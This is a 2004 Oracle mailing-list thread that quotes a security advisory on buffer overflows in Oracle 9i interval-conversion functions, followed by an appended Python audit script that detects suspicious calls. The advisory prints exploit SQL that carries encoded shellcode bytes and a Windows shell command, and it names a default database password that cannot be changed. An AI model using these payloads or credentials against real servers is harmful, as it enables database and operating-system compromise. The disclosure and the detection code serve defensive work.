Re: [NEWS] Oracle Database 9ir2 Interval Conversion Buffer Overflow

  • From: mkb <mkb125@xxxxxxxxx>
  • To: oracle-l@xxxxxxxxxxxxx
  • Date: Thu, 26 Feb 2004 13:17:25 -0800 (PST)

Funnily enough, on 9.2.0.2 on HP-UX I get this:

illegal argument for function

and 

desc NUMTOYMINTERVAL
object NUMTOYMINTERVAL does not exist

--- mkb <mkb125@xxxxxxxxx> wrote:
> Hmmmm.....
> 
> Oracle 9.2.0.3 on Win2K, shut down the instance and
> the Oracle service.
> 
> Pretty serious bug to me.
> 
> mohammed
> 
> --- Jared.Still@xxxxxxxxxxx wrote:
> > Has anyone here heard of this?
> > 
> > First I've seen it.  Could not get the exploit to
> > work on 8i or 9i, 
> > haven't tried 10g.
> > 
> > It does however cause an ORA-3113.
> > 
> > Jared
> > 
> > =================================
> > 
> > The following security advisory is sent to the
> > securiteam mailing list, 
> > and can be found at the SecuriTeam web site:
> > http://www.securiteam.com 
> > - - - - - - - - -
> > Oracle Database 9ir2 Interval Conversion Buffer Overflow
> > Oracle Database Server is one of the most used database servers in the
> > world; it was marketed as being unbreakable, and many people think that it is
> > one of the most secure database servers on the market.
> > 
> > Oracle Database Server provides two functions that can be used with PL/SQL
> > to convert numbers to date/time intervals; these functions have buffer
> > overflow vulnerabilities.
> > Vulnerable Systems:
> >  * Oracle Database version 9ir2 and prior
> > 
> > When any of these conversion functions is called with a long string as the
> > second parameter, a buffer overflow occurs.
> > 
> > To reproduce the overflow execute the next PL/SQL:
> > SELECT NUMTOYMINTERVAL(1,'longstringhere') from dual;
> > SELECT NUMTODSINTERVAL(1,'longstringhere') from dual;
> > 
> > Any Oracle Database user can exploit this vulnerability because access to
> > these functions can't be restricted. Exploitation of this vulnerability
> > allows an attacker to execute arbitrary code; it can also be exploited to
> > cause DOS (Denial of Service), killing the Oracle server process. An attacker
> > can completely compromise the OS and database if Oracle is running on a
> > Windows platform, because Oracle must run under the Local System account
> > or under an administrative account. If Oracle is running on *nix then only
> > the database could be compromised, because Oracle mostly runs under the oracle
> > user, which has restricted permissions.
> > 
> > Important: Exploitation of these vulnerabilities becomes easy if Oracle Internet
> > Directory has been deployed, because Oracle Internet Directory creates a
> > database user called ODSCOMMON that has a default password ODSCOMMON; this
> > password can not be changed, so any attacker can use this user to connect
> > to the database and exploit these vulnerabilities.
> > 
> > Full tests on Oracle database 9ir2 under Microsoft Windows 2000 Server and
> > Linux confirm these vulnerabilities. Versions running on other OS
> > platforms are believed to be affected too. Previous Oracle Database Server
> > versions could be affected by these vulnerabilities.
> > 
> > 
> > Exploits:
> > -- These exploits should work on Windows 2000 Server and Windows XP, not
> > tested on Windows 2003.
> > -- Run any command at the end of the string
> > SELECT 
> >
>
NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
> > || 
> > chr(59) || chr(79) || chr(150) || chr(01) ||
> > chr(141) || chr(68) || 
> > chr(36) || chr(18) || chr(80) || chr(255) ||
> chr(21)
> > || chr(52) || chr(35) 
> > || chr(148) || chr(01) || chr(255) || chr(37) ||
> > chr(172) || chr(33) || 
> > chr(148) || chr(01) || chr(32)||'echo ARE YOU
> SURE?
> > >c:\Unbreakable.txt') 
> > ?FROM DUAL; 
> > 
> > SELECT 
> >
>
NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
> > || 
> > chr(59) || chr(79) || chr(150) || chr(01) ||
> > chr(141) || chr(68) || 
> > chr(36) || chr(18) || chr(80) || chr(255) ||
> chr(21)
> > || chr(52) || chr(35) 
> > || chr(148) || chr(01) || chr(255) || chr(37) ||
> > chr(172) || chr(33) || 
> > chr(148) || chr(01) || chr(32) || 'echo ARE YOU
> > SURE? 
> > >c:\Unbreakable.txt') ? 
> > 
> > FROM DUAL; 
> > 
> > Vendor Fix:
> > Go to Oracle Metalink site, http://metalink.oracle.com.
> > 
> > Vendor Contact:
> > Oracle was contacted and they released a fix without telling the public
> > nor Cesar anything and without issuing an alert.
> > Additional Information:
> > The information has been provided by Cesar.
=== message truncated ===


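An added example, not part of this thread or the SecuriTeam advisory: a Python audit that scans SQL text (for instance statements pulled from V$SQL or an audit trail) for NUMTOYMINTERVAL and NUMTODSINTERVAL calls whose second argument is not one of the unit literals those functions accept, resolving '||' chains of string literals and CHR(n) so an argument assembled the way the advisory's is does not slip past a plain literal match. The valid-unit sets come from Oracle's SQL reference; the sample statements are constructed for the demo, and the length threshold is an assumption. A non-unit argument is also what produces the "illegal argument for function" error reported above, so on a patched server these calls fail loudly rather than silently.

```python
import re
# Unit literals each function accepts (Oracle SQL reference); anything else is an error or an attack.
VALID_UNITS = {"NUMTOYMINTERVAL": {"YEAR", "MONTH"},
               "NUMTODSINTERVAL": {"DAY", "HOUR", "MINUTE", "SECOND"}}
CALL_RE = re.compile(r"\b(NUMTOYMINTERVAL|NUMTODSINTERVAL)\s*\(", re.I)
PIECE_RE = re.compile(r"'((?:[^']|'')*)'|CHR\s*\(\s*(\d+)\s*\)", re.I)  # one '||' operand: literal or CHR(n)

def _unit_arg(sql, start):
    """Return the call's second argument: text after the first top-level comma up to the matching ')'."""
    depth, args, buf = 1, [], ""
    for tok in re.findall(r"'(?:[^']|'')*'|[(),]|[^'(),]+", sql[start:]):  # quoted literals stay whole
        depth += (tok == "(") - (tok == ")")
        if depth == 0: break
        if tok == "," and depth == 1:
            args.append(buf); buf = ""
        else:
            buf += tok
    return (args + [buf])[1].strip() if args else ""

def _resolve(expr):
    """Evaluate a '||' chain of literals and CHR(n) to bytes; None if any operand is not constant."""
    out, pos = bytearray(), 0
    for m in PIECE_RE.finditer(expr):
        if expr[pos:m.start()].strip() not in ("", "||"):
            return None  # a column, bind variable or other non-constant operand in the chain
        out += (m.group(1).replace("''", "'").encode("latin-1") if m.group(1) is not None
                else bytes([int(m.group(2)) % 256]))  # single-byte character set assumed
        pos = m.end()
    return None if expr[pos:].strip() else bytes(out)

def audit(sql, max_len=8):
    """Return (function, reason, excerpt) for each call whose unit argument is not a legitimate unit."""
    findings = []
    for m in CALL_RE.finditer(sql):
        func, arg = m.group(1).upper(), _unit_arg(sql, m.end())
        raw = _resolve(arg)
        if raw is None:  # bind variable or column: cannot judge statically, but worth a look
            findings.append((func, "unresolved", arg))
        elif raw.decode("latin-1").strip().upper() not in VALID_UNITS[func]:
            reasons = (["length %d" % len(raw)] if len(raw) > max_len else []) + \
                      (["non-printable bytes"] if any(b < 0x20 or b > 0x7E for b in raw) else [])
            findings.append((func, ", ".join(reasons) or "unknown unit", raw.decode("latin-1")[:20]))
    return findings

SAMPLES = [  # constructed statements: benign, two shaped like the advisory's, one with a bind variable
    "SELECT NUMTOYMINTERVAL(27, 'month') FROM dual",
    "SELECT NUMTODSINTERVAL(1,'longstringhere') from dual",
    "SELECT NUMTOYMINTERVAL(1,'" + "A" * 20 + "' || chr(144) || chr(01) || 'B') FROM DUAL",
    "SELECT NUMTODSINTERVAL(v, :unit) FROM t",
]
```

Running `audit` over each of the samples flags the second, third and fourth statements and leaves the benign first one alone.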